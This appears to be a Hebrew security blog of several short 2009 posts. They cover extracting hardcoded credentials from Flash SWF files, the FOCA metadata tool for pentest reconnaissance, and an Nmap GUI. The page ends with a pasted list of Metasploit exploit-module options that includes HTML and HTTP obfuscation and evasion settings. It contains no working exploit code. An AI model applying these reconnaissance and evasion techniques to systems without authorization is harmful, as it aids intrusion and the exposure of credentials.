שיכלול טכנולוגית ה FLASH מאפשרכיום לעשות הרבה מעבר להצגת גרפיקה .דפי LOGIN , הפניות ,ושאר ירקות מתאפשרות ע"י שימוש ב ACTION SCRIPTS .

במחקרים שעשו מצאו שהשימוש ב AS המקודד HARDCODED בקובץ ה FLASH הוא נרחב וכן רמת האבטחה בו נמוכה.

מפתחים מטביעים שמות משתמשים וססמאות,וכן הפניות לדפים חסויים בתוך הקוד בהנחה כי אין דרך לבצע שליפה של הקוד מתוך הקובץ.

האמנם?

מסתבר שאפשר וזה אפילו קל לחלץ ACTION SCRIPT מתוך קובץ SWF או כל פורמט FLASH אחר.

ניתוח של המידע הזה מאפשר לנו להבין פגיעויות באתר הן ברמת ה FLASH עצמו והן ברמת חשיפת פרטים נוספים.

2 כלים חינמיים שמצאתי חילוץ וניתוח AS

flare

hp swfScan

FYI

FOCA RC1- כלי חדש לחילוץ METADATA ממסמכים.

2009-09-13T06:14:00.005+03:00

METADATA = מידע המוסף למסמכים וקבצים ע"י תוכנות עריכה למטרות שימוש התוכנות עצמם .

המידע יכול להכיל:

תאריך ושעה בהם נוצר המסמך
שם המתשמש שיצר את המסמך
שם המחשב או השרת הפנימי
כתובות דואר אלקטרוני
נתיבים המסמכים
שמות מדפסות

ניתן לעשות שימוש במידע זה בשלב איסוף הנתונים בהליך ה PENTEST ובמיוחד כשמבצעים BLACK BOX PENTEST.

FOCA - הוא כלי הלוקח את הגילוי והניתוח שלב אחד קדימה,ע"י הגדרת הדומיין שאותו אנו רוצים לחקור ,הוא מבצע חיפוש לכל סוגי המסמכים המאורכבים במנועי החיפוש ,מוריד אותם למחשב המקומי ,מבצע ניתוח של הMETADATA ומציג אותו לפי קטגוריות ( users,printers'computer'email) וכו.

להורדת הכלי

NMAP GUI חדש מבית K_ZEE

2009-08-26T08:35:00.004+03:00

GUI פשוט יעיל ונוח להרצת NMAP המכיל פרמטרים להרצת של הסריקות הנפוצות וכל הסקריפטים החדשים.

כמובן שיש להתקין NMAP כהתקנה רגילה לפני השימוש ב GUI

להורדה

http://rapidshare.com/files/271595506/Nmap_GUI.rar.html

SRVHOST	The local host to listen on. (default: 0.0.0.0)
SRVPORT	The local port to listen on. (default: 8080)
SSL	Negotiate SSL for incoming connections
SSLVersion	Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) (default: SSL3)
URIPATH	The URI to use for this exploit (default is random)
ContextInformationFile	The information file that contains context information
DisablePayloadHandler	Disable the handler code for the selected payload
EnableContextEncoding	Use transient context when encoding payloads
WORKSPACE	Specify the workspace for this module
HTML::base64	Enable HTML obfuscation via an embeded base64 html object (accepted: none, plain, single_pad, double_pad, random_space_injection)
HTML::javascript::escape	Enable HTML obfuscation via HTML escaping (number of iterations)
HTML::unicode	Enable HTTP obfuscation via unicode (accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be)
HTTP::chunked	Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
HTTP::compression	Enable compression of HTTP responses via content encoding (accepted: none, gzip, deflate)
HTTP::header_folding	Enable folding of HTTP headers
HTTP::junk_headers	Enable insertion of random junk HTTP headers
TCP::max_send_size	Maximum tcp segment size. (0 = disable)
TCP::send_delay	Delays inserted before every send. (0 = disable)